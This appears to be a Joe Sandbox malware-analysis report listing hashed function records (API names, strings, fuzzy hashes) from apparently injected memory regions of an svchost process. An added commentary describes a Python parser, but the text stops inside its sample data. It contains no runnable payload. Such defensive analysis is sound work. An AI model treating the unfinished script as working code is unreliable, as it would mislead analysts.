                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: 4e1a75a037d890f7a3af027752f69dd1f5d83a83d0a6e2d613213ff947cde410
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: 80018E31348B408AF611CBD2A488BAA63A1F749BCAF444035DE5E83754DF3AC589C380
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: 7f1ef5d5059ce12c61f5d97a27b9455fb86792ee4b09ca0f56259de58aeb52b2
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: 6D016574659B408AFB259BD1E48ABA567A1B749B8BF040425CD4F87765EF3FC104C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 4c990827edacdc3879a7cb4c8e50599e697146fcddd6f7e908c96fcc5a92b3c1
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 1B517D32649701AAFB149B95E48AFBA27D7F345B9EF119124DA1F83748EB37D840C780
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 5b401db059e9ca29837f15a6baad8a1f4cd991064a946fc7a0a4d37f863a2710
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: F9318E31248740AAF714DF91E886BBA37A6F344B8EF058124AE4F83745DB3BD940C784
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: b74828290f2ae62677b66e179717fd8b661321355523e7ba451828796880c1a7
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: DBF0813234874096F7208BE4E8C5BA96361F748B9DF845020CA4E86954DB2FC64DCB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: 37321554d2df0aa79fc22873e2386afc887469eaa0481ba7fb1d3ff3d9e834d8
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: C0F0AF7125970489FB118FE4E4C6BB92321EB8977AF4402198A6F851E4CF2BC049C780
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: 3c5f480dda9202fff783b6f139fd1f0141ab971eaac63cb1c0237ba01f6de79c
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: A2F0543068878085FA144BD6B9955A56261AB49FD6F084120DD4F87B15DF2AC445C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction ID: 32d60e69eea9e2b2788f8227f4ad6006050a75537e6b2dfa38ae953cf35e1181
                                                                      • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction Fuzzy Hash: 2902E83225DB8486E760CB95E4917AEB7A1F3C4789F101015EA8F87BA9DFBEC444CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction ID: 9c1493acfd7b5872a94b8db0ae71fae0010280c453ccaf9609f860de902d1b3d
                                                                      • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction Fuzzy Hash: 9C61F83655DB40C6F7608B95E485BAE77A1F388789F105116EA9F87BA8CBBFC440CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: f252b24e3e3f9fbba2903bc14e13e79b0561aa045f8524dcd908ab4369d06102
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 1D118232A98F5019FE6615E8D4D7FF619417B683AEF080624A57FC66D68B2BC841C182
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 62decd75e8cd862665d9d8c7f09f2ea4bdb99cc7548c456523e92675cecc9a33
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 2511C4726DCB0151FA5411E8E6D3BF910C06B5CB7EF484638A96F862F78B27F848C180
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: 99ebee8ea45fe0a9786a9c4ed11dd03fcaa3952423eabe6646d82df20e5116f7
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 7061C23668C30042FA658BE5E5C3BFE6EA0E78178EF544515DA0F937A4DBB7C841C288
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 7acbc2e4e8793f3fe0f44b886d3766375e5a85e830d565591bd1b1d9b19824ab
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: A5618936608B849AFB109FA5D481BED7BA2F344B8DF045205EE4F57B98DB3AC095C780
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 0c549113169c63b82f4eb0439e5f8d0fded427d2edf7ff314c8146e84b243ff3
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 02518E721483809BFB748BE190C5BA97BA2E354B8AF146115DA5FC7AD5CB3BD450C780
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: fd0772b57a10f5ee3d03dfca06ca8f8fdafda8dc318c2fb514941a215750b28d
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 7151D236188380CAFB648BD59081BBC77A0F355B8AF046116DA5FC7B95CBBBC450C798
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 7dda59274c03c3fa635dd33b5e12994a731da3bfc9d46b6666e8b71b45b3c75c
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 73519132649B008AFB54CBD6E485FA83795F354B9DF508124DE1B83B58EBB7E840C788
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: d574a5838cee0a89f3f3a63565909bfd7782941e71e265548c8e5aea6bd2b172
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: 6F318D31249B409AF714DF92E886BA937A4F340B8EF058014EE5F83B94DB7BD940C788
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: f20432c764ec1e0b106a42a51970bf11a474d24c72dd99a7e8f550ff0ed66ca1
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: E4D1BC72758B808DF712CBE9D481AEC3BB5E354799F004216EE5E97B99DB36C506C380
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: 0478c1a3af261ca2c2e0ef0fcd73c2b7d176ce7ca8816933a5e730a685654da8
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: 6A018036548B90DEE706DFE2E8855AA67A1F749F8AF045028DA4F83715DF36C050C780
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: 66dc8eb791194b220bed5d3989a0fe2ba9d1d817296486305e4d0376b7eb8cdb
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: D791A132648B5089F7629FE584C2BFD2BA8A704B8EF145109EE0F97695DB37C446C780
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: 26315b277f0833fa29e6206e1a37c947975b73cd93ff35a93702093b29e9861a
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: 24114C32755B0089FB01CBE0E8967A933B4F71976DF441E21DA6E827A4DB7AC198C380
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: 0f062c2000fda37f594db2641492732ab4a3e092627b12192f5d619f654c7c9e
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: 6771D3362487C195F6349FE59882BF96B9AF389B8AF440025DD0F87B99DB37C945C380
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 8a50fd077b55d767147a8b684bd0014825f6ee4c9455cdaf633ba578169a54a8
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 4F616832608B448AFB208FA5D0817ED77A0F344B8DF044216EE6E57B99DBBAD055C784
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: a2bfb7fda913f1e1fe19f6c7b4fcb7ee1ffa8c84edc466839910cc72a59897c2
                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: 3C51073224C7C2A1F6258BE9A1E5BFA6656F38574AF440015CE4F83B5ADB3BD505C7C0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: cd8d986b631c472f2e62d269227b9dd1cdefb2696399252b170650b3eb51d930
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: BE41D632319B4085EB21CFA5E4857E977A5F788799F404021EE4EC7794DB3EC401C780
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: eebf817035f43bb8bd238e610929092bc7213130e6fb6148e294eab5ce3c98b4
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: 78113032258B4082FB618F55F4407A977E5F788B99F584220DE8E47759DF3EC551CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: 8889b0c47ec14da33e3277f015dfdf4e0413e94902c43d1922f8fea6f1334091
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: 1BE08671684B4890EF018FA2E8816E833A0DB68B68F489122D95D46321FB39D1F9C341
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: 377f2ecfa8fe3b999a50dcb3cab1f77f510c3be82b2217139a6f9118ea1a173d
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: 57E08671644F4880EF028FA1D4815E87360E768B58F889122C94D46321EB39D1E5C341
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 912d26b72c26ad93e34c569596d669a6ded88d197370947b8223babb3ee4b667
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: 9511B235605B4495FA05CBE6A485ABAB3A1F789FCAF085028CE4F87765DF3BC446C380
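The function records above all follow one fixed layout: a "Memory Dump Source" header, then "• Key: value" bullets for the source dump, snapshot file, API ID, String ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes. Several Opcode IDs recur in this section under different Instruction IDs and at two different dump base addresses of the same svchost process (b607b9418e... at 000001CBD8BD0000 and again at 000001CBD8BA0000; c123fbbb87... likewise), which is the kind of fact worth extracting when hunting for the same payload in other regions or other reports. The Python below is an added example written for this edit, not part of the Joe Sandbox report or of Joe Sandbox's own tooling; it assumes only the record layout visible on this page, and its sample input is three records copied from this section.

```python
"""Parse the per-function records a Joe Sandbox report lists for each memory dump
and flag Opcode IDs that recur in more than one dumped region of the same process.
Added example; assumes only the record layout visible in the report text."""
import re
from collections import defaultdict

# Constructed sample: three records copied from this report's PID-67 svchost section.
SAMPLE = r"""
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction ID: 0c549113169c63b82f4eb0439e5f8d0fded427d2edf7ff314c8146e84b243ff3
• Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction Fuzzy Hash: 02518E721483809BFB748BE190C5BA97BA2E354B8AF146115DA5FC7AD5CB3BD450C780
Memory Dump Source
• Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
Joe Sandbox IDA Plugin
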